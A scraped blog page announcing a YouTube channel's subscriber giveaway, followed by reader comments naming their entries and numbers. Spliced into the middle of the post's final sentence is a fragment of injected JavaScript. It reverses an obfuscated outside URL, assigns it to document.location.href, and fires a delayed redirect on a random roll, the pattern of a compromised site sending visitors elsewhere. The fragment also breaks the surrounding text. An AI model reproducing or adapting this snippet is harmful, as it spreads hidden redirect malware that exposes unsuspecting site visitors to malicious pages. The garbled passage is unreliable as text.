Gday everyone !
Its been one hell of a journey so far and i cant thank you all enough for the support and love you have all shown on a daily basis and for that i bring you the YAE GIVEAWAY !!

Must be subscribed
Must like this video
Must upload entry video

Good luck you bunch of fucking stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toners !

Youtube Channel

17 thoughts on “YAES GIVEAWAY DETAILS !!”

  1. Get a Life Niko says:

    6th view. Much love Yae. Hope you're doing better man, you sound and look great. Keep up the good vibes brotha

  2. PORK SOSA T.V. says:

    Where you live at looks likes u in a dessert!! Cheers brother count me in!

  3. Clerkster says:

    Noice idea, come on lets see them vids stoners, i'll take me 37 boyo >>> https://www.youtube.com/watch?v=4oTaDwrWCGQ

  4. tam bam says:

    Heres my video for the comp..number 20 please..

  5. Rand Amonium says:

    Awesome giveaway! Everybody get your entry in!

  6. The Stoner Grandma says:

    Numbers what thru what??

  7. Kiefer Smokerman says:

    congrats on the subs brother, well deserved.. cheers you fucking stoner

  8. JimmyY420 says:

    1500 BOOOYYYY!!! ALRIGHT…ALRIGHT..!!!!!!

  9. GanjaGimp says:

    Here’s my entry Yae. https://youtu.be/tOhZNW9RQsI I choose 18. Keep rolling!! ✌️

  10. Weed gamer says:

    What up

  11. dabby productions says:

    Hey man officially uploaded the vid https://youtu.be/EbcSjvIiPQg and ill take 8

  12. True Patriot says:

    hey friend just subbed

  13. Bingus says:

    May the subs be with you. Cheers!

  14. Rhys Smallwood says:

    Heres one from down under
    Keep growing your collection, you fking stoner

  15. Bonez 420 saiyan says:

    I choose 22

  16. Warnock69xxx says:

    I'll work on one bro

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